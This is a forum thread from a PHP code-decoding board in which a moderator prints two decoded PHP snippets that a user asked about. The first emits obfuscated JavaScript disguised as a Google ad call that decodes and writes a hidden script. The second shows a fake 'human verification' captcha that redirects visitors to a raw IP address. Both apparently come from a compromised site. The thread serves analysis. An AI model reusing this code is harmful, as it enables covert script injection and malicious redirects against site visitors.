|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 117
Members: 0
Total: 117
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Can You decode this one? |
|
Posted: Tue Aug 14, 2012 6:59 pm |
|
|
pauliakas |
Beginner |
|
|
Joined: Aug 14, 2012 |
Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Aug 14, 2012 7:44 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
#1
Code: | <?php
foreach($_GET as$k=>$v)if(preg_match("!^[a-z0-9]{10,32}\$!is",$k)){
$txt='<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf("?"); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); }
document.write(new_str.substr(0,new_str.length-11)+"&gokk=ZZZZ";</script>");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF902FDF5F7FBFDF1F3F9F7EDF7F5EB2424211E1F1CE3241B22F01D1622111216E7DDDDDADACB12190A050CDC11080005FFBBD3D3C508F705FB0104CD");
//--> </SCRIPT>';
echo str_replace("ZZZZ",$k,$txt);
exit;
}
?> |
#2
Code: | <?php
foreach($_GET as$k=>$v)if(preg_match("!^[a-z0-9]{10,32}$!is",$k)){session_start();
if(isset($_POST["res"])&&$_SESSION["res"]==$_POST["res"]){
header("Location: http://95.169.187.98/ijhfhf.php?mgtdfk=4534&nvhdl=skdje&gokk=".substr($k,-5));
}
else{
$a=mt_rand(1,9);
$c=mt_rand(1,9);
if(mt_rand(0,1)==1){
$_SESSION["res"]=$a+$c;
$b="+";
}
else{
$_SESSION["res"]=$a-$c;
$b="-";
}
echo"<form method='post'>\n\t <div style='width:520px;
margin:0px auto;
margin-top:100px;
padding:15px;
border:1px solid #333;
background-color:#eee;
'>\n\t Please verify that you are human,\n\t what is result of: ".$a." ".$b." ".$c." =\n\t <input type='text' name='res' size='2' value='?'>\n\t <input type='submit' value='I am Human!'>\n\t </div></form>";
}exit;
}
?> |
|
|
|
|
|
|
|
|
|
Posted: Tue Aug 14, 2012 7:48 pm |
|
|
astra1993 |
Advanced user |
|
|
Joined: Jun 20, 2012 |
Posts: 125 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Aug 14, 2012 7:52 pm |
|
|
pauliakas |
Beginner |
|
|
Joined: Aug 14, 2012 |
Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|